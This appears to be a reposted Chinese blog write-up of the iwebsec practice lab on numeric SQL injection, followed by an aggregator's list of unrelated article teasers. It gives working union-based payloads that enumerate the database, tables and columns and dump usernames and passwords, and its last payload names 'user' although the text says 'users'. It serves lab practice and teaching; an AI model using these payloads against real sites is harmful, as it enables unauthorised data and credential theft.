iwebsec-SQL數字型注入

iwebsec-SQL數字型注入

news/2025/9/10 3:43:26/文章來源:https://blog.csdn.net/m0_60984906/article/details/146036376

?

1.判斷是否存在漏洞

添加and 1=1發現正常顯示，添加and 1=2無回顯條目，則存在sql注入漏洞

2.因為有回顯，嘗試union聯合注入，使用order by判斷出有3個字段

3.使用union聯合注入查看回顯位，發現3三個字段均有回顯，任意使用字段注入即可

4.獲取數據庫名

?id=-1 union select database(),2,3

5.獲取表名，這時候發現如果使用1和2回顯位會顯示報錯，那么可以使用3回顯位回顯

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

6.猜測用戶可能存在user或users表中，先使用user表查看字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"

7.查看id=1的username和password

這里應該不是user表，真是用戶存在users表，將表名改為users一樣

?id=-1 union select 1,2,group_concat(username,',',password) from user where id=1

?

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/898332.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/898332.shtml
英文地址，請注明出處：http://en.pswp.cn/news/898332.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！

相關文章

藍橋杯每日五題第一日

藍橋杯每日五題第一日

藍橋杯每日5題問題一班級活動 1.班級活動 - 藍橋云課問題描述小明的老師準備組織一次班級活動。班上一共有 nn 名 (nn 為偶數) 同學，老師想把所有的同學進行分組，每兩名同學一組。為了公平，老師給每名同學隨機分配了一個 nn 以內的正…

閱讀更多...

STM32 —— 嵌入式系統、通用計算機系統、物聯網三層架構

STM32 —— 嵌入式系統、通用計算機系統、物聯網三層架構

目錄一、嵌入式系統的概念二、通用計算機系統與嵌入式系統的比較用途硬件軟件性能與功耗開發與維護三、嵌入式系統與物聯網的關系四、物聯網的三層架構 1. 感知層（Perception Layer） 2. 網絡層（Network Layer） …

閱讀更多...

卡碼網25題——掌握ACM輸入輸出方式（15 至 18）

卡碼網25題——掌握ACM輸入輸出方式（15 至 18）

刷題小記： 本期涉及ACM模式下棧和鏈表的構建與使用，值得學習。卡瑪網15.神秘字符（卡瑪網15.神秘字符） 題目分析： 若給定2行字符串，其中第一個串的長度為偶數，現要求把第二個串插入到第一個…

閱讀更多...

前端字段名和后端不一致？解鎖 JSON 映射的“隱藏規則” ！！！

前端字段名和后端不一致？解鎖 JSON 映射的“隱藏規則” ！！！

🚀 前端字段名和后端不一致？解鎖 JSON 映射的“隱藏規則” 🌟 嘿，技術冒險家們！👋 今天我們要聊一個開發中常見的“坑”：前端傳來的 JSON 參數字段名和后端對象字段名不一致，會發生…

閱讀更多...

python中使用單例模式在整個程序中只創建一個數據庫連接，節省資源

python中使用單例模式在整個程序中只創建一個數據庫連接，節省資源

示例代碼： from loguru import logger from pymongo import MongoClient from pymongo.errors import ConnectionFailurefrom llm_engineering.settings import settingsclass MongoDatabaseConnector:_instance: MongoClient | None Nonedef __new__(cls, *args,…

閱讀更多...

AI小白的第六天：必要的數學知識（一）

AI小白的第六天：必要的數學知識（一）

在學習的過程中，不管是上代碼還是理論學習，其中都摻雜了一些數學知識。俗話說“磨刀不誤砍柴工”，而我已經“誤了砍柴功”了，現在變成了“亡羊補牢，為時不晚”。線性代數線性代數是數學的一個分支，主要…

閱讀更多...

【Linux】Bash是什么？怎么使用？

【Linux】Bash是什么？怎么使用？

李升偉整理什么是 Bash？ Bash（Bourne Again Shell）是一種命令行解釋器（Shell），廣泛用于 Unix 和 Linux 操作系統。它是 Bourne Shell（sh） 的增強版，提供了更多的功能…

閱讀更多...

Qt Creator入門

Qt Creator入門

1.創建項目選擇創建項目-Application（Qt）-Qt Widgets Application-修改名稱即可默認創建有窗口類，myWidget,基類有三種選擇：QWidget，QMainWindow，QDialog 注意： 名稱和創建路徑不能有中文、…

閱讀更多...

C語言經典代碼練習題

C語言經典代碼練習題

1.輸入一個4位數：輸出這個輸的個位十位百位千位 #include <stdio.h> int main(int argc, char const *argv[]) {int a;printf("輸入一個４位數：");scanf("%d",&a);printf("個位：%d\n"…

閱讀更多...

cls(**dict(data, id=id))靈活地從一個字典生成實例，同時確保某些關鍵字段（如 id）被正確設置或覆蓋

cls(**dict(data, id=id))靈活地從一個字典生成實例，同時確保某些關鍵字段（如 id）被正確設置或覆蓋

示例代碼： classmethoddef from_mongo(cls: Type[T], data: dict) -> T:"""Convert "_id" (str object) into "id" (UUID object)."""if not data:raise ValueError("Data is empty.")id data.pop…

閱讀更多...

MyBatis XMLMapperBuilder 是如何將 SQL 語句解析成可執行的對象？如何將結果映射規則解析成對應的處理器？

MyBatis XMLMapperBuilder 是如何將 SQL 語句解析成可執行的對象？如何將結果映射規則解析成對應的處理器？

1. XMLMapperBuilder 如何將 SQL 語句解析成可執行對象 (MappedStatement): XMLMapperBuilder 解析 <select>, <insert>, <update>, <delete> 等 SQL 語句元素時，并不僅僅是簡單地讀取 SQL 文本，而是要將 SQL 語句和相關的配置…

閱讀更多...

咖啡點單小程序畢業設計（JAVA+SpringBoot+微信小程序+完整源碼+論文）

咖啡點單小程序畢業設計（JAVA+SpringBoot+微信小程序+完整源碼+論文）

?全網粉絲20W,csdn特邀作者、博客專家、CSDN新星計劃導師、java領域優質創作者,博客之星、掘金/華為云/阿里云/InfoQ等平臺優質作者、專注于Java技術領域和畢業項目實戰? 🍅文末獲取項目下載方式🍅 一、項目背景介紹： 隨著社會的快速發展和…

閱讀更多...

003-掌控命令行-CLI11-C++開源庫108杰

003-掌控命令行-CLI11-C++開源庫108杰

首選的現代C風格命令行參數解析器! （本課程包含兩段教學視頻。） 以文件對象監控程序為實例，五分鐘實現從命令行讀入多個監控目標路徑；區分兩大時機，學習 CLI11 構建與解析參數兩大場景下的異常處理；區分三…

閱讀更多...

【leetcode hot 100 124】二叉樹中的最大路徑和

【leetcode hot 100 124】二叉樹中的最大路徑和

解法一：（遞歸）考慮實現一個簡化的函數 maxGain(node)，該函數計算二叉樹中的一個節點的最大貢獻值，具體而言，就是在以該節點為根節點的子樹中尋找以該節點為起點的一條路徑，使得該路徑上的節點值…

閱讀更多...

譜分析方法

譜分析方法

前言本文隸屬于專欄《機器學習數學通關指南》，該專欄為筆者原創，引用請注明來源，不足和錯誤之處請在評論區幫忙指出，謝謝！ 本專欄目錄結構和參考文獻請見《機器學習數學通關指南》 ima 知識庫知識庫廣場搜索&#…

閱讀更多...

在圖像/視頻中裁剪出人臉區域

在圖像/視頻中裁剪出人臉區域

1. 在圖像中裁剪人臉區域 import face_alignment import skimage.io import numpy from argparse import ArgumentParser from skimage import img_as_ubyte from skimage.transform import resize from tqdm import tqdm import os import numpy as np import warnings warni…

閱讀更多...

【軟考-架構】11.3、設計模式-新

【軟考-架構】11.3、設計模式-新

?資料&文章更新? GitHub地址：https://github.com/tyronczt/system_architect 文章目錄項目中的應用設計模式創建型設計模式結構型設計模式行為型設計模式 💯考試真題題外話項目中的應用在實際項目中，我應用過多種設計模式來解決不同…

閱讀更多...

使用Redis如何實現分布式鎖？（超賣）

使用Redis如何實現分布式鎖？（超賣）

分布式鎖概念在多線程環境下，為了保證數據的線程安全，鎖保證同一時刻，只有一個可以訪問和更新共享數據。在單機系統我們可以使用 synchronized 鎖、Lock 鎖保證線程安全。 synchronized 鎖是 Java 提供的一種內置鎖，在單個 JVM …

閱讀更多...

Linux的Shell編程

Linux的Shell編程

一、什么是Shell 1、為什么要學習Shell Linux運維工程師在進行服務器集群管理時，需要編寫Shell程序來進行服務器管理。對于JavaEE和Python程序員來說，工作的需要。Boss會要求你編寫一些Shell腳本進行程序或者是服務器的維護，比如編寫一個…

閱讀更多...

使用React和google gemini api 打造一個google gemini應用

使用React和google gemini api 打造一個google gemini應用

實現一個簡單的聊天應用，用戶可以通過輸入問題或點擊“Surprise me”按鈕獲取隨機問題，并從后端API獲取回答。 import { useState } from "react"; function App() {const [ value, setValue] useState(""); // 存儲用戶輸入的問題…

閱讀更多...

最新文章